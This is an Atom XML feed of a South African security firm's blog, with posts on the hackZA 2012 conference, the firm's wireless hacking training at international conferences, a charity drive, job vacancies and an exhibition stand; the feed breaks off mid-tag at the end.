<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2540168616552398462</id><updated>2012-01-25T13:16:09.926+02:00</updated><category term='Celebrations'/><category term='encryption'/><category term='Microsoft'/><category term='Wi-Fi'/><category term='dan kaminsky'/><category term='dns'/><category term='wireless'/><category term='hackZA'/><category term='hacking'/><category term='events'/><category term='china'/><category term='summit'/><category term='Charity - Santa&apos;s Shoebox'/><category term='Training'/><category term='Classic FM'/><category term='Google'/><title type='text'>Telspace Systems, The Blog</title><subtitle type='html'>Hackers for hire</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>64</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-1395684783269213493</id><published>2012-01-19T14:43:00.002+02:00</published><updated>2012-01-25T13:16:09.931+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hackZA'/><title type='text'>hackZA Security Conference - Registration now OPEN!</title><content type='html'>&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;Telspace Systems is proud to announce event sponsorship of hackZA 2012, the information security conference to be held in Johannesburg, South Africa.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;&lt;br /&gt;The purpose of the hackZA 2012 conference is to provide a platform and playground where international speakers are brought to South Africa to present their ground breaking research with no boundaries or vendor intervention.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;&lt;br /&gt;Speakers are brought out to Johannesburg to present their training and talk topics to educate an audience which would not be able to attend other international conferences due to finance restrictions and so forth. hackZA is a technical conference where local residents can engage with speakers, learn from them and be entertained.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;&lt;br /&gt;Confirmed international speakers and topics are as follows:&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;&lt;br /&gt;* Julio Auto (Brazil) Playing with x86 code normalization&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;* Joe McCray (USA) - You Spent All That Money And You Still Got Owned???&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;* Jayson E. Street (USA) - Steal Everything, Kill Everyone, Cause Total Financial Ruin!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;* Hemil Shah (India and SA) - Penetrating Mobile Applications - Attacks &amp;amp; Exploits&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;The conference will be held in Johannesburg, South Africa during April 2012. The dates are the 2nd and 3rd April 2012 for technical training and 4th April 2012 for a single track highly technical conference.&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;&lt;br /&gt;International training courses are as follows:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;&lt;br /&gt;* Hemil Shah – Web Application Security – Threats and Countermeasures&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;* Joe McCray – Advanced Penetration testing&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;* Dino Covotsos – Hacking Wireless and Bluetooth 101&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="font-family: 'Courier New', Courier, monospace; font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family: Verdana, sans-serif; font-size: x-small;"&gt;If you would like to attend please register on www.hackza.com .&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-1395684783269213493?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/1395684783269213493/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=1395684783269213493' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1395684783269213493'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1395684783269213493'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2012/01/hackza-security-conference-registration.html' title='hackZA Security Conference - Registration now OPEN!'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6185758839821117399</id><published>2012-01-01T15:00:00.000+02:00</published><updated>2012-01-02T00:37:58.348+02:00</updated><title type='text'>Happy New Year from Telspace Systems!</title><content type='html'>&lt;div style="background-color: white; color: #555555; line-height: 19px; margin-left: 15px; margin-right: 15px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 5px;"&gt;&lt;b&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;It's the very first day of 2012, and we want to take this opportunity to wish you all a very happy New Year.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; margin-left: 15px; margin-right: 15px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 5px;"&gt;&lt;b style="background-color: white;"&gt;&lt;span style="color: #555555;"&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif; line-height: 19px;"&gt;2011 was by far our best year ever! We managed to cram in so many amazing&amp;nbsp;opportunities&amp;nbsp;of presenting and training internationally, including places such as Dallas, Miami, New York and Rwanda! We really&amp;nbsp;wouldn't' have been able to do any of this without the support of a great number of people.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; margin-left: 15px; margin-right: 15px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 5px;"&gt;&lt;div style="color: #555555; line-height: 19px;"&gt;&lt;b style="background-color: white;"&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;I want to thank our entire team for all their hard work during 2011, you are the people that make Telspace Systems run day to day and assure our clients of world class services. Hardly anyone actually see's the amount of real hours you put in and I would like to personally say thank you for going above and beyond.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="background-color: white; color: #555555; line-height: 19px; margin-left: 15px; margin-right: 15px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 5px;"&gt;&lt;b&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;Most of all I want to thank our loyal customers and friends who are the real reason that we are still in business and are able to produce such interesting work. Thank you for everything!&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; color: #555555; line-height: 19px; margin-left: 15px; margin-right: 15px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 5px;"&gt;&lt;b&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;We've really enjoyed a huge amount of growth and support during 2011 and I am positive that 2012 will be a bumper year for us. We have huge plans for 2012, just watch this space!&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; color: #555555; line-height: 19px; margin-left: 15px; margin-right: 15px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 5px;"&gt;&lt;b&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;On behalf of everyone at Telspace Systems I would like to wish you all a very happy New Year! We look forward to being of service to you.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6185758839821117399?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6185758839821117399/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6185758839821117399' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6185758839821117399'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6185758839821117399'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2012/01/happy-new-year-from-telspace-systems.html' title='Happy New Year from Telspace Systems!'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-8528529393815220678</id><published>2011-11-29T14:33:00.001+02:00</published><updated>2011-11-29T14:40:50.393+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Charity - Santa&apos;s Shoebox'/><title type='text'>Santa Shoe Box - Feedback</title><content type='html'>&lt;br /&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;The Santa Shoe Box drive is over and we are pleased toannounce it was an incredible success as approximately &lt;span style="color: #b91f1f; font-family: Helvetica, sans-serif; font-size: 14.5pt;"&gt;70 489 &lt;/span&gt;Boxeswere collected.&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-DEUimysS4Wg/TtTRkQ3lYlI/AAAAAAAAAD8/emKwUgicUe0/s1600/149241_172114256141524_112712045415079_524545_1469216_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-DEUimysS4Wg/TtTRkQ3lYlI/AAAAAAAAAD8/emKwUgicUe0/s320/149241_172114256141524_112712045415079_524545_1469216_n.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;Year on year we are pleased to be seeing an increase in thenumber of participants, it’s great to see how many people are willing to assista charitable cause such as this.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-3tSx38YraeQ/TtTSFngVjsI/AAAAAAAAAEM/zA8VgkTules/s1600/375444_303356316350650_112712045415079_1188504_1075137989_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-3tSx38YraeQ/TtTSFngVjsI/AAAAAAAAAEM/zA8VgkTules/s1600/375444_303356316350650_112712045415079_1188504_1075137989_n.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;We would like to thank each and every person who contributedto this worthy cause and made it a Christmas to remember for tens of thousandsof underprivileged kids.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-SH96xjJW-6E/TtTR0jmb_TI/AAAAAAAAAEE/44o99VVPWWY/s1600/148594_173681762651440_112712045415079_535671_5927465_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-SH96xjJW-6E/TtTR0jmb_TI/AAAAAAAAAEE/44o99VVPWWY/s320/148594_173681762651440_112712045415079_535671_5927465_n.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;We are looking forward to being part of a bigger target nextyear , as well as seeing an exponential growth in the number of participants.&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-8528529393815220678?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/8528529393815220678/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=8528529393815220678' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/8528529393815220678'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/8528529393815220678'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/11/santa-shoe-box-feedback.html' title='Santa Shoe Box - Feedback'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-DEUimysS4Wg/TtTRkQ3lYlI/AAAAAAAAAD8/emKwUgicUe0/s72-c/149241_172114256141524_112712045415079_524545_1469216_n.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-7273884192298184525</id><published>2011-11-17T15:09:00.001+02:00</published><updated>2011-11-17T15:22:38.626+02:00</updated><title type='text'>Hacker Halted - Miami 2011</title><content type='html'>&amp;nbsp;&lt;b&gt;After a successful Wireless and Bluetooth Hacking 101 course presented at TakeDownCon in Dallas(USA) earlier this year, Telspace Systems was invited to present and train students at the well known Hacker Halted in Miami, during October 2011.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Our training class was very well attended by many Military(Defence) and Banking clients. We recieved fantastic reviews of our class and after generating statistics, we are extremely happy with the outcome of maintaining high&amp;nbsp;quality training worldwide.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Statistics are as follows:&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: -webkit-auto;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;b&gt;&lt;a href="http://3.bp.blogspot.com/-D88I9m9Y-4I/TsUICQCWQ2I/AAAAAAAAAD0/p5pvUuhyQGw/s1600/hackerhalted-stats.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="496" src="http://3.bp.blogspot.com/-D88I9m9Y-4I/TsUICQCWQ2I/AAAAAAAAAD0/p5pvUuhyQGw/s640/hackerhalted-stats.jpg" width="640" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Hacker Halted in Miami was an extremely well attended conference which was well organised. The conference itself featured many international "superstars" from the information security arena and completely exceeded our expectations(which were already high because of TakeDownCon).&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;A big thank you to the entire crew that organised everything for us in Miami(Joyce and Leo, thanks!).&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;We look forward to seeing all our friends(and now family) at Hacker Halted next year!&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-7273884192298184525?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/7273884192298184525/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=7273884192298184525' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7273884192298184525'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7273884192298184525'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/11/hacker-halted-miami-2011.html' title='Hacker Halted - Miami 2011'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-D88I9m9Y-4I/TsUICQCWQ2I/AAAAAAAAAD0/p5pvUuhyQGw/s72-c/hackerhalted-stats.jpg' height='72' width='72'/><thr:total>1</thr:total><georss:featurename>Miami, FL, USA</georss:featurename><georss:point>25.7889689 -80.2264393</georss:point><georss:box>25.6745919 -80.38436779999999 25.9033459 -80.0685108</georss:box></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5052455603710320917</id><published>2011-08-02T13:29:00.003+02:00</published><updated>2011-08-02T13:32:19.334+02:00</updated><title type='text'>IT Security jobs- August 2011</title><content type='html'>In this ever-changing industry comes a passion and desire to learn. A vast majority of companies are looking for talented professionals to fill a void within their organisation, in order to stay abreast of the swift changes experienced daily. &lt;br /&gt;&lt;br /&gt;The difficulty experienced in filling the gap comes down to three basic elements – timing, shortage of skills/experience and awareness. Many employees in various positions have basically picked up the skills very early on and grown within the industry from the beginning of their careers. &lt;br /&gt;The trend we have identified and followed, illustrates hard evidence of an active market and a lack of awareness. &lt;br /&gt;&lt;br /&gt;We are here to fill that gap.&lt;br /&gt;&lt;br /&gt;We have various IT Security related vacancies available on a national scale with incredible clients, a few of which are as follows:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-1kBbi26sDoc/Tjff-bCZu0I/AAAAAAAAADs/WrzW5Y4mSJU/s1600/newsletter.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 146px;" src="http://4.bp.blogspot.com/-1kBbi26sDoc/Tjff-bCZu0I/AAAAAAAAADs/WrzW5Y4mSJU/s320/newsletter.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5636219722180180802" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Should you be interested to see what is available or you are possibly looking for a fresh challenge, please send us your CV or contact us via email at &lt;a href="shaun@telspace.co.za"&gt;shaun[@]telspace.co.za&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Should you be looking for top notch talent for your business, we have an extensive database of able and willing candidates to fit your requirements.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5052455603710320917?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5052455603710320917/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5052455603710320917' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5052455603710320917'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5052455603710320917'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/08/it-security-jobs-august-2011.html' title='IT Security jobs- August 2011'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-1kBbi26sDoc/Tjff-bCZu0I/AAAAAAAAADs/WrzW5Y4mSJU/s72-c/newsletter.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-7192784706883545068</id><published>2011-06-15T23:14:00.005+02:00</published><updated>2011-06-17T15:20:09.728+02:00</updated><title type='text'>Telspace Systems invited to train at first-ever TakeDownCon</title><content type='html'>Telspace Systems was invited to present its Wireless &amp; Bluetooth Hacking 101 training course at the first-ever TakeDownCon in Dallas recently.&lt;br /&gt;&lt;br /&gt;The conference, which took place between 14-19 May 2011, was the first of the EC-Council’s new technical IT security conference series.&lt;br /&gt;&lt;br /&gt;“We are privileged to have had the opportunity to train students at this new security conference series,” says Dino Covotsos, CEO of Telspace Systems.&lt;br /&gt;&lt;br /&gt;According to feedback reports, the training course was very well-received by the students, the majority of which were from the US government. “The course was fantastic . It was very fast-paced and in depth. It provided a great learning experience,” was one of the comments received by a student.&lt;br /&gt;&lt;br /&gt;Student feedback was as follows:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-3jmE90rZy0M/Tfkj0bmc_ZI/AAAAAAAAADk/LdRsKca0Wu8/s1600/stats.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 262px;" src="http://1.bp.blogspot.com/-3jmE90rZy0M/Tfkj0bmc_ZI/AAAAAAAAADk/LdRsKca0Wu8/s320/stats.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5618561393790614930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Wireless &amp; Bluetooth Hacking 101 course ran over 2 days after which each student went home with a brand-new iPad 2 device. &lt;br /&gt;&lt;br /&gt;Says Covotsos, “The training was truly exceptional, and we got a large amount of new business interest and networking contacts as a result. It was an honour for Telspace to be recognised alongside international IT training providers.”&lt;br /&gt;&lt;br /&gt;Other types of training available included ethical hacking, penetration testing, digital forensics and application security.&lt;br /&gt;&lt;br /&gt;Also at TakeDownCon, Rodrigo Rubira Branco, The Director of Vulnerability Malware Research at Qualys and founder of the Dissect || PE project, did a presentation on automated malware analysis, which is currently considered to be the top trend in the security industry. We recommend you check out his presentation and slide deck at the TakeDownCon website.&lt;br /&gt;&lt;br /&gt;SpeedHack @ TakeDownCon, a brand new hacking competition designed just for registered TakeDownCon attendees, took place on the evening of 17 May. Watch out for some new exciting developments with hacking competitions worldwide.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Coming up&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Telspace Systems has been invited to offer its Wireless &amp; Bluetooth Hacking 101  training course at two other associate conferences, namely Hacker Halted - Miami at the end of October 2011, and TakeDownCon Las Vegas in December 2011.&lt;br /&gt;&lt;br /&gt;“It bodes well not only for Telspace Systems, but for South Africa if we are recognised at these types of international conferences,” says Covotsos. “International trends are usually ahead of local ones – and it helps us and our clients to travel abroad like this so that we can bring back home the knowledge we gained, and share it with the local industry.”&lt;br /&gt;&lt;br /&gt;TakeDownCon website: &lt;a href="http://www.takedowncon.com"&gt;http://www.takedowncon.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-7192784706883545068?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/7192784706883545068/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=7192784706883545068' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7192784706883545068'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7192784706883545068'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2011/06/telspace-systems-invited-to-train-at.html' title='Telspace Systems invited to train at first-ever TakeDownCon'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-3jmE90rZy0M/Tfkj0bmc_ZI/AAAAAAAAADk/LdRsKca0Wu8/s72-c/stats.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5573893062150400584</id><published>2011-05-23T10:49:00.006+02:00</published><updated>2011-05-23T11:01:36.999+02:00</updated><title type='text'>Telspace represents at the ITWeb Security Summit 2011</title><content type='html'>&lt;div style="text-align: center;"&gt;Telspace Systems, for the first time, exhibited at the ITWeb Security Summit 2011 in the form of the prominent stand 14.&lt;/div&gt;&lt;p class="MsoNormal"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt; &lt;br /&gt;&lt;img src="http://4.bp.blogspot.com/-LzI48LsV8iQ/TdohdBgn6WI/AAAAAAAAAAc/-ujjfr9XtgI/s320/Summit%2BStand.jpg" style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5609833068348565858" /&gt;&lt;p class="MsoNormal"&gt;It was a successful two days, the hype amongst our stand proved that the industry is gearing towards something big and electrifying for the future of IT Security. We were excited to have met some new faces as well as some of the leading minds in the industry. We also had the opportunity to showcase our new Recruitment division, which had a great response and the spinoff is beginning to show.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;img src="http://1.bp.blogspot.com/-fgl93Xuh_4w/Tdog8GE0C-I/AAAAAAAAAAU/eGOmf940LBQ/s320/Telspace%2BSystems%2BRecruitment.jpg" style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 226px; height: 320px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5609832502638414818" /&gt;&lt;br /&gt;&lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;We would like to take the opportunity to thank all that attended and visited Telspace Systems, the responses were phenomenal and the stats look good. We are looking forward to meeting you all again very soon &lt;span style="font-family:Wingdings"&gt;J&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;br /&gt;&lt;img src="http://1.bp.blogspot.com/-bbNJWR4r32k/TdogZ9pZvPI/AAAAAAAAAAM/ly6QYj_H0oA/s320/Graph.gif" style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 161px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5609831916260408562" 